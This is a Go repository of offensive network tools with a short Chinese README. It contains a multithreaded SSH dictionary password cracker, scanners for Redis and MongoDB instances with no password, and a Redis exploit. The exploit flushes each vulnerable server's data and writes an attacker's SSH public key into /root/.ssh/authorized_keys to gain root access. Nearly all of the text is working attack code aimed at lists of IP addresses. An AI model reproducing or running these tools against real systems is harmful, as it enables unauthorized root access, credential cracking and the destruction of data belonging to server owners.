├── .gitattributes ├── .gitignore ├── README.md ├── redis_poc.go ├── scan_mongodb.go ├── scan_redis.go └── scan_ssh.go /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Windows image file caches 2 | Thumbs.db 3 | ehthumbs.db 4 | 5 | # Folder config file 6 | Desktop.ini 7 | 8 | # Recycle Bin used on file shares 9 | $RECYCLE.BIN/ 10 | 11 | # Windows Installer files 12 | *.cab 13 | *.msi 14 | *.msm 15 | *.msp 16 | 17 | # Windows shortcuts 18 | *.lnk 19 | 20 | # ========================= 21 | # Operating System Files 22 | # ========================= 23 | 24 | # OSX 25 | # ========================= 26 | 27 | .DS_Store 28 | .AppleDouble 29 | .LSOverride 30 | 31 | # Thumbnails 32 | ._* 33 | 34 | # Files that might appear on external disk 35 | .Spotlight-V100 36 | .Trashes 37 | 38 | # Directories potentially created on remote AFP share 39 | .AppleDB 40 | .AppleDesktop 41 | Network Trash Folder 42 | Temporary Items 43 | .apdisk 44 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 说明 2 | 1. scan_ssh.go为ssh口令扫描器,iplist中的内容格式为ip:port 3 | 1. scan_redis为redis空口令扫描器,iplist中的内容格式为ip:port 4 | 1. scan_mongodb为mongodb空口令扫描器,iplist中的内容格式为ip:port 5 | 1. redis_poc为redis弱口令get root利用工具,iplist中的内容格式为ip:port 6 | 7 | ## 注: 8 | 请大家不用关注这个项目了,直接看这个吧,[https://github.com/netxfly/x-crack](https://github.com/netxfly/x-crack) 9 | -------------------------------------------------------------------------------- /redis_poc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "bytes" 6 | "fmt" 7 | "gopkg.in/redis.v3" 8 | "log" 9 | "os" 10 | "runtime" 11 | "strings" 12 | "time" 13 | ) 14 | 15 | const rsa_key = "\n\ncat ~/.ssh/id_rsa.pub的内容,自己用ssh-keygen -t rsa生成下即可\n\n" 16 | 17 | // HostInfo struct 18 | type HostInfo struct { 19 | host string 20 | port string 21 | reply string 22 | is_vul bool 23 | } 24 | 25 | // help function 26 | func Usage(cmd string) { 27 | fmt.Println(strings.Repeat("-", 50)) 28 | fmt.Println("Redis weak password poc by netxfly") 29 | fmt.Println("Usage:") 30 | fmt.Printf("%s iplist \n", cmd) 31 | fmt.Println(strings.Repeat("-", 50)) 32 | } 33 | 34 | // main function 35 | func main() { 36 | runtime.GOMAXPROCS(runtime.NumCPU()) 37 | 38 | if len(os.Args) != 2 { 39 | Usage(os.Args[0]) 40 | } else { 41 | Usage(os.Args[0]) 42 | iplist := os.Args[1] 43 | Scan(Prepare(iplist)) 44 | } 45 | } 46 | 47 | // read line from file and Scan 48 | func Prepare(iplist string) (slice_iplist []string) { 49 | iplistFile, _ := os.Open(iplist) 50 | defer iplistFile.Close() 51 | scanner := bufio.NewScanner(iplistFile) 52 | scanner.Split(bufio.ScanLines) 53 | for scanner.Scan() { 54 | slice_iplist = append(slice_iplist, scanner.Text()) 55 | } 56 | 57 | return slice_iplist 58 | } 59 | 60 | //Test connect function 61 | func TestConnect(host_info HostInfo, chan_result chan HostInfo) { 62 | host := host_info.host 63 | port := host_info.port 64 | reply := host_info.reply 65 | is_vul := false 66 | 67 | var buf bytes.Buffer 68 | logger := log.New(&buf, "logger: ", log.Ldate) 69 | 70 | client := redis.NewClient(&redis.Options{ 71 | Addr: host + ":" + port, 72 | Password: "", // no password set 73 | DB: 0, // use default DB 74 | }) 75 | 76 | _, err := client.Ping().Result() 77 | if err == nil { 78 | is_vul = true 79 | 80 | logger.Println(client.ConfigSet("dbfilename", "xsec.rdb").String()) 81 | logger.Println(client.Save().String()) 82 | logger.Println(client.FlushAll().String()) 83 | 84 | client.Set("xsec", rsa_key, 0) 85 | logger.Println(client.ConfigSet("dir", "/root/.ssh/").String()) 86 | logger.Println(client.ConfigGet("dir").String()) 87 | reply = client.ConfigSet("dbfilename", "authorized_keys").String() 88 | logger.Println(reply) 89 | logger.Println(client.Save().String()) 90 | fmt.Println(&buf) 91 | } 92 | 93 | host_info.is_vul = is_vul 94 | host_info.reply = reply 95 | chan_result <- host_info 96 | 97 | } 98 | 99 | // Scan function 100 | func Scan(slice_iplist []string) { 101 | n := len(slice_iplist) 102 | chan_scan_result := make(chan HostInfo, n) 103 | done := make(chan bool, n) 104 | 105 | for _, host_port := range slice_iplist { 106 | // fmt.Printf("Try to connect %s\n", host_port) 107 | t := strings.Split(host_port, ":") 108 | host := t[0] 109 | port := t[1] 110 | host_info := HostInfo{host, port, "", false} 111 | 112 | go TestConnect(host_info, chan_scan_result) 113 | for runtime.NumGoroutine() > runtime.NumCPU()*200 { 114 | time.Sleep(10 * time.Microsecond) 115 | } 116 | 117 | } 118 | 119 | go func() { 120 | for i := 0; i < cap(chan_scan_result); i++ { 121 | select { 122 | case r := <-chan_scan_result: 123 | if r.is_vul { 124 | fmt.Printf("%s:%s is vulnerability, get root's reply: %s\n", r.host, r.port, r.reply) 125 | } 126 | case <-time.After(60 * time.Second): 127 | fmt.Println("timeout") 128 | break 129 | 130 | } 131 | done <- true 132 | 133 | } 134 | }() 135 | 136 | for i := 0; i < cap(done); i++ { 137 | <-done 138 | } 139 | 140 | } 141 | -------------------------------------------------------------------------------- /scan_mongodb.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "fmt" 6 | "github.com/MG-RAST/golib/mgo" 7 | "os" 8 | "runtime" 9 | "strings" 10 | "time" 11 | ) 12 | 13 | // Host Info define 14 | type HostInfo struct { 15 | Host string 16 | Port string 17 | Dbs []string 18 | Is_weak bool 19 | } 20 | 21 | // help function 22 | func Usage(cmd string) { 23 | fmt.Println(strings.Repeat("-", 50)) 24 | fmt.Println("Redis Scanner by hartnett x@xsec.io") 25 | fmt.Println("Usage:") 26 | fmt.Printf("%s iplist \n", cmd) 27 | fmt.Println(strings.Repeat("-", 50)) 28 | } 29 | 30 | // read line from file and Scan 31 | func Prepare(iplist string) (slice_iplist []string) { 32 | iplistFile, _ := os.Open(iplist) 33 | defer iplistFile.Close() 34 | scanner := bufio.NewScanner(iplistFile) 35 | scanner.Split(bufio.ScanLines) 36 | for scanner.Scan() { 37 | slice_iplist = append(slice_iplist, scanner.Text()) 38 | } 39 | 40 | return slice_iplist 41 | } 42 | 43 | // main function 44 | func main() { 45 | runtime.GOMAXPROCS(runtime.NumCPU()) 46 | 47 | if len(os.Args) != 2 { 48 | Usage(os.Args[0]) 49 | } else { 50 | Usage(os.Args[0]) 51 | iplist := os.Args[1] 52 | Scan(Prepare(iplist)) 53 | } 54 | } 55 | 56 | // Connect to mongodb 57 | func TestConnect(host_info HostInfo, chan_host_info chan HostInfo) { 58 | host := host_info.Host 59 | port := host_info.Port 60 | is_weak := host_info.Is_weak 61 | url := fmt.Sprintf("%s:%s", host, port) 62 | session, err := mgo.DialWithTimeout(url, 2*time.Second) 63 | if err == nil { 64 | dbs, err := session.DatabaseNames() 65 | if err == nil { 66 | is_weak = true 67 | host_info.Dbs = dbs 68 | } 69 | } 70 | host_info.Is_weak = is_weak 71 | chan_host_info <- host_info 72 | } 73 | 74 | // Scan function 75 | func Scan(slice_iplist []string) { 76 | n := len(slice_iplist) 77 | chan_scan_result := make(chan HostInfo, n) 78 | done := make(chan bool, n) 79 | 80 | for _, host_port := range slice_iplist { 81 | // fmt.Printf("Try to connect %s\n", host_port) 82 | t := strings.Split(host_port, ":") 83 | host := t[0] 84 | port := t[1] 85 | host_info := HostInfo{host, port, []string{}, false} 86 | 87 | go TestConnect(host_info, chan_scan_result) 88 | for runtime.NumGoroutine() > runtime.NumCPU()*200 { 89 | time.Sleep(10 * time.Microsecond) 90 | } 91 | 92 | } 93 | 94 | go func() { 95 | for i := 0; i < cap(chan_scan_result); i++ { 96 | select { 97 | case r := <-chan_scan_result: 98 | if r.Is_weak { 99 | fmt.Printf("%s:%s is vulnerability, DBs:%s\n", r.Host, r.Port, r.Dbs) 100 | } 101 | case <-time.After(3 * time.Second): 102 | // fmt.Println("timeout") 103 | break 104 | 105 | } 106 | done <- true 107 | 108 | } 109 | }() 110 | 111 | for i := 0; i < cap(done); i++ { 112 | <-done 113 | } 114 | 115 | } 116 | -------------------------------------------------------------------------------- /scan_redis.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "fmt" 6 | "github.com/beego/redigo/redis" 7 | "os" 8 | "runtime" 9 | "strings" 10 | "time" 11 | ) 12 | 13 | // HostInfo struct 14 | type HostInfo struct { 15 | host string 16 | port string 17 | reply string 18 | is_vul bool 19 | } 20 | 21 | // help function 22 | func Usage(cmd string) { 23 | fmt.Println(strings.Repeat("-", 50)) 24 | fmt.Println("Redis Scanner by hartnett x@xsec.io") 25 | fmt.Println("Usage:") 26 | fmt.Printf("%s iplist \n", cmd) 27 | fmt.Println(strings.Repeat("-", 50)) 28 | } 29 | 30 | // main function 31 | func main() { 32 | runtime.GOMAXPROCS(runtime.NumCPU()) 33 | 34 | if len(os.Args) != 2 { 35 | Usage(os.Args[0]) 36 | } else { 37 | Usage(os.Args[0]) 38 | iplist := os.Args[1] 39 | Scan(Prepare(iplist)) 40 | } 41 | } 42 | 43 | // read line from file and Scan 44 | func Prepare(iplist string) (slice_iplist []string) { 45 | iplistFile, _ := os.Open(iplist) 46 | defer iplistFile.Close() 47 | scanner := bufio.NewScanner(iplistFile) 48 | scanner.Split(bufio.ScanLines) 49 | for scanner.Scan() { 50 | slice_iplist = append(slice_iplist, scanner.Text()) 51 | } 52 | 53 | return slice_iplist 54 | } 55 | 56 | //Test connect function 57 | func TestConnect(host_info HostInfo, chan_result chan HostInfo) { 58 | host := host_info.host 59 | port := host_info.port 60 | reply := host_info.reply 61 | is_vul := false 62 | c, err := redis.Dial("tcp", host+":"+port) 63 | // _, err := redis.DialTimeout("tcp", host+":"+port, 2*time.Second, 2*time.Second, 2*time.Second) 64 | if err == nil { 65 | s, err := redis.String(c.Do("ping")) 66 | if err == nil { 67 | is_vul = true 68 | reply = s 69 | } 70 | } 71 | 72 | host_info.is_vul = is_vul 73 | host_info.reply = reply 74 | chan_result <- host_info 75 | 76 | } 77 | 78 | // Scan function 79 | func Scan(slice_iplist []string) { 80 | n := len(slice_iplist) 81 | chan_scan_result := make(chan HostInfo, n) 82 | done := make(chan bool, n) 83 | 84 | for _, host_port := range slice_iplist { 85 | // fmt.Printf("Try to connect %s\n", host_port) 86 | t := strings.Split(host_port, ":") 87 | host := t[0] 88 | port := t[1] 89 | host_info := HostInfo{host, port, "", false} 90 | 91 | go TestConnect(host_info, chan_scan_result) 92 | for runtime.NumGoroutine() > runtime.NumCPU()*200 { 93 | time.Sleep(10 * time.Microsecond) 94 | } 95 | 96 | } 97 | 98 | go func() { 99 | for i := 0; i < cap(chan_scan_result); i++ { 100 | select { 101 | case r := <-chan_scan_result: 102 | if r.is_vul { 103 | fmt.Printf("%s:%s is vulnerability, ping's reply: %s\n", r.host, r.port, r.reply) 104 | } 105 | case <-time.After(3 * time.Second): 106 | // fmt.Println("timeout") 107 | break 108 | 109 | } 110 | done <- true 111 | 112 | } 113 | }() 114 | 115 | for i := 0; i < cap(done); i++ { 116 | <-done 117 | } 118 | 119 | } 120 | -------------------------------------------------------------------------------- /scan_ssh.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "bytes" 6 | "fmt" 7 | "github.com/btcsuite/golangcrypto/ssh" 8 | "log" 9 | "os" 10 | "runtime" 11 | "strings" 12 | "time" 13 | ) 14 | 15 | type HostInfo struct { 16 | host string 17 | port string 18 | user string 19 | pass string 20 | is_weak bool 21 | } 22 | 23 | // help function 24 | func Usage(cmd string) { 25 | fmt.Println(strings.Repeat("-", 50)) 26 | fmt.Println("SSH Scanner by hartnett ") 27 | fmt.Println("Usage:") 28 | fmt.Printf("%s iplist userdic passdic\n", cmd) 29 | fmt.Println(strings.Repeat("-", 50)) 30 | } 31 | 32 | // read lime from file and Scan 33 | func Prepare(iplist, user_dict, pass_dict string) (slice_iplist, slice_user, slice_pass []string) { 34 | iplistFile, _ := os.Open(iplist) 35 | defer iplistFile.Close() 36 | scanner := bufio.NewScanner(iplistFile) 37 | scanner.Split(bufio.ScanLines) 38 | for scanner.Scan() { 39 | slice_iplist = append(slice_iplist, scanner.Text()) 40 | } 41 | 42 | user_dictFile, _ := os.Open(user_dict) 43 | defer user_dictFile.Close() 44 | scanner_u := bufio.NewScanner(user_dictFile) 45 | scanner_u.Split(bufio.ScanLines) 46 | for scanner_u.Scan() { 47 | slice_user = append(slice_user, scanner_u.Text()) 48 | } 49 | 50 | pass_dictFile, _ := os.Open(pass_dict) 51 | defer pass_dictFile.Close() 52 | scanner_p := bufio.NewScanner(pass_dictFile) 53 | scanner_p.Split(bufio.ScanLines) 54 | for scanner_p.Scan() { 55 | slice_pass = append(slice_pass, scanner_p.Text()) 56 | } 57 | 58 | return slice_iplist, slice_user, slice_pass 59 | } 60 | 61 | // Scan function 62 | func Scan(slice_iplist, slice_user, slice_pass []string) { 63 | for _, host_port := range slice_iplist { 64 | fmt.Printf("Try to crack %s\n", host_port) 65 | t := strings.Split(host_port, ":") 66 | host := t[0] 67 | port := t[1] 68 | n := len(slice_user) * len(slice_pass) 69 | chan_scan_result := make(chan HostInfo, n) 70 | 71 | for _, user := range slice_user { 72 | for _, passwd := range slice_pass { 73 | 74 | host_info := HostInfo{} 75 | host_info.host = host 76 | host_info.port = port 77 | host_info.user = user 78 | host_info.pass = passwd 79 | host_info.is_weak = false 80 | 81 | go Crack(host_info, chan_scan_result) 82 | for runtime.NumGoroutine() > runtime.NumCPU()*300 { 83 | time.Sleep(10 * time.Microsecond) 84 | } 85 | } 86 | } 87 | done := make(chan bool, n) 88 | go func() { 89 | for i := 0; i < cap(chan_scan_result); i++ { 90 | select { 91 | case r := <-chan_scan_result: 92 | fmt.Println(r) 93 | if r.is_weak { 94 | var buf bytes.Buffer 95 | logger := log.New(&buf, "logger: ", log.Ldate) 96 | logger.Printf("%s:%s, user: %s, password: %s\n", r.host, r.port, r.user, r.pass) 97 | fmt.Print(&buf) 98 | } 99 | case <-time.After(1 * time.Second): 100 | // fmt.Println("timeout") 101 | break 102 | 103 | } 104 | done <- true 105 | 106 | } 107 | }() 108 | 109 | for i := 0; i < cap(done); i++ { 110 | // fmt.Println(<-done) 111 | <-done 112 | } 113 | 114 | } 115 | 116 | } 117 | 118 | // crack passwd 119 | func Crack(host_info HostInfo, chan_scan_result chan HostInfo) { 120 | host := host_info.host 121 | port := host_info.port 122 | user := host_info.user 123 | passwd := host_info.pass 124 | is_ok := host_info.is_weak 125 | 126 | config := &ssh.ClientConfig{ 127 | User: user, 128 | Auth: []ssh.AuthMethod{ 129 | ssh.Password(passwd), 130 | }, 131 | } 132 | client, err := ssh.Dial("tcp", host+":"+port, config) 133 | if err != nil { 134 | is_ok = false 135 | // panic("Failed to dial: " + err.Error()) 136 | } else { 137 | session, err := client.NewSession() 138 | defer session.Close() 139 | 140 | if err != nil { 141 | is_ok = false 142 | } else { 143 | is_ok = true 144 | 145 | } 146 | 147 | } 148 | 149 | host_info.is_weak = is_ok 150 | chan_scan_result <- host_info 151 | } 152 | 153 | // main function 154 | func main() { 155 | runtime.GOMAXPROCS(runtime.NumCPU()) 156 | 157 | if len(os.Args) != 4 { 158 | Usage(os.Args[0]) 159 | } else { 160 | Usage(os.Args[0]) 161 | iplist := os.Args[1] 162 | user_dict := os.Args[2] 163 | pass_dict := os.Args[3] 164 | Scan(Prepare(iplist, user_dict, pass_dict)) 165 | } 166 | } 167 | --------------------------------------------------------------------------------